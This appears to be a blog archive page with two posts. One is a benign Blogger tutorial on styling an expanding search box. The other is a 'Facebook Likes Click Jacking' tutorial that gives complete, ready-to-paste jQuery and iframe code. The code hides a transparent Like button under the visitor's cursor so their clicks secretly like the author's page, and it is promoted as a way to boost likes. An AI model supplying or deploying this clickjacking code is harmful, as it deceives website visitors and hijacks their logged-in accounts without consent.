Showing posts with label click. Show all posts
Showing posts with label click. Show all posts
Monday, February 27, 2017
Sunday, February 5, 2017
Expand Click Search Box on Blogger
Expand Click Search Box on Blogger

Expand Click Search Box like the image above is a search box if the visitor/user wants to search and click on search box, it will be expand towards the position that we defined according with the position of search box that we place on the template of our site/blog. This style gives an impression more elegant, exciting the visitors who want to search the content and make comfortable.
In this case I will apply the process about to change the standard search box on the blog template that created by Artisteer so that it becomes more attractive search box that I called Expand Click Search Box Float Right. For other types of templates, you have to take this analogy. Lets see the standards search box that may be you have. Were going to make it to be more interactive with the same function.


Right click on the area around search box on the template of your blog. If you are using mozilla firefox as the browser will appears inspect element (Q) then you click there. You will get the information of the search box with html code on the template that you use as shown as the right picture above. <form
.>...</ form> will display the search box according with css style that we going to change, receive the input from the visitor/user and then execute by action path that you have defined.
Descriptions of the right picture above :
- Number 1: caller css class script that determines the position of the search box on the template ( it is depending on the template that you use)
- Number 2: css class that will give you style search box, which will change with the style of expand click search box
- Number 3: path execution of the search box into your blog content search based on keywords typed by visitor/user.
According with the logic above I hope you do not get confused when you apply it to your template. Lets begin with the following steps
1. Find search box tag on the template of your blog. Login to the dashboard of your blog and click Template> Edit Html and Ctrl+F inside the template code. In this case i just Type "<form", i will find the tag form of search box as shown as the picture below!

Then we are going to change the part of tag <form
> .... </ form> with the script below
<form action=/2013/06/search.html id=search method=get> <input name=q placeholder=Search... size=40 type=text/> </form>
- /2013/06/search.html is the path of the search page integrate with google CSE of the search post article.
- search is the css style of the expand click search box that I will give then.
- placeholder=Search... is the text that appears when the search box is not active or have not entered keyword by visitor/user.
2. Define the style of expand click search box, like the script code below!
#search { } #search input[type="text"] { background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikSqCyIhY8dfakFh8A_WvTEP448-tEKwGYDW8AYGn_OWajXKS3Rpkyke4yFJcRDN40W_q451ObZLaYfZ8VVMYOej4ztbVn29zntlZbahRJUrzzI3d_5BLW0fsFCrjKSGYzgW8olmftmKY/s2048/searchicon.png) no-repeat 10px 6px #ffffff; border: 1px solid #000000; font: bold 12px Arial,Helvetica,Sans-serif; color: #000000; width: 150px; padding: 6px 15px 6px 35px; -webkit-border-radius: 20px; -moz-border-radius: 20px; border-radius: 20px; text-shadow: 0 2px 2px rgba(0, 0, 0, 0.1); box-shadow: 0px 1px 1px rgb(26, 56, 103) inset; transition: all 0.5s ease-in-out 0s; transition-property: all; transition-duration: 0.5s; transition-timing-function: ease-in-out; transition-delay: 0s; float:right; } #search input[type="text"]:focus { background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikSqCyIhY8dfakFh8A_WvTEP448-tEKwGYDW8AYGn_OWajXKS3Rpkyke4yFJcRDN40W_q451ObZLaYfZ8VVMYOej4ztbVn29zntlZbahRJUrzzI3d_5BLW0fsFCrjKSGYzgW8olmftmKY/s2048/searchicon.png) no-repeat 10px 6px #fcfcfc; width: 230px; float:right; } - float:right; is determines the direction of expanding search box when activeted.
- background: url(... is the image icon of search box is used which can be changed as you wish. You can exploring by changing css script above. Insert the script above into the skin of your blog template.
3. adjust the expand search box position. In this case the template that I used to have css class ".art-object989822972" so that the css tag of position to be the css script below. It really depends on the definition of the form tag search box based on template that you use.
.art-object989822972{ position: absolute; top: 110px; right:10px; width:300px; height: 24px; } Or you can also change the name of the css class on the tag form of expand click search box, then you define the value as the script ".art-object989822972" above. Hope can help you, if not clear lets see the following video!
Available link for download
Friday, January 27, 2017
Facebook Likes Click Jacking Tutorial Script
Facebook Likes Click Jacking Tutorial Script
facebook likes clickjacking click jacking script tutorial facebook clickjacking script click jacking how to increase facebook likes hack free trick facebook likes jacking free tutorial hacking
![]() |
| facebook likes click jacking |
Today i am going to share a trick from which you can increase your face book fan page likes like hell fire. our todays topic is on how you can increase your Facebook likes by click jacking the users.
what is click jacking ?
According to OWASP
Click jacking, also known as a "UI redress attack", is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.
But in simple words click jacking is like guiding the blind peoples in wrong direction for your wealth.
Because in click jacking mostly peoples try to hijack facebook likes and what they do is first they make the like button of facebook transparent in such a way that it is available but because of its transparency peoples cant see it and after they use java script to move this like button over your mouse, mean where ever your mouse will move this button will move with your cursor on the web page.
And they use this complete script in their web pages and all those visitors which come to that page read the article and if they are logged in from their facebook account and if they click on the webpage the like will be made automatically to your page after they click.
Get Started
I am going to give you ready made facebook likes click jacking script and you can use it only for testing.
- Put the below script code above </head> in your html/php page
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>
<script type="text/javascript">
function ClickJackFbHide(){
jQuery("div[id^=clickjack-button-wrapper]").hide();
}
function ClickJackFbShow(){
jQuery("div[id^=clickjack-button-wrapper]").show();
}
</script>
- Now below is the main code so put it before </body> in html/php
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=0); margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Replace Your facebook fan pageurl&layout=button_count&show_faces=false&
width=50&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>
</div>
<script type="text/javascript">
jQuery( document ).ready( function() {
$( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
jQuery( "#clickjack-button-wrapper-5" ).css( {
top: e.pageY - 10,
left: e.pageX + 30
} );
} );
clickjack_hider();
var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
} );
function clickjack_hider(){
jQuery("input").mouseout(function(){ClickJackFbShow();});
jQuery("a").mouseout(function(){ClickJackFbShow();});
jQuery("button").mouseout(function(){ClickJackFbShow();});
jQuery("textarea").mouseout(function(){ClickJackFbShow();});
jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();}); jQuery("object").mouseout(function(){ClickJackFbShow();});
jQuery("input").mouseover(function(){ClickJackFbHide();});
jQuery("a").mouseover(function(){ClickJackFbHide();});
jQuery("button").mouseover(function(){ClickJackFbHide();});
jQuery("textarea").mouseover(function(){ClickJackFbHide();});
jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();}); jQuery("object").mouseover(function(){ClickJackFbHide();});
}
</script>
Now check the script i am 100% sure this is working because i have tested it right now so first unlike your page and then check the script you will get the finger on the page which is a sign that script is working and like button is moving with your cursor in hidden mode.
Keep visiting and also if you face any problem regarding this article dont hesitate to do comment below i will answer your question as soon as possible.
Available link for download
Subscribe to:
Posts (Atom)
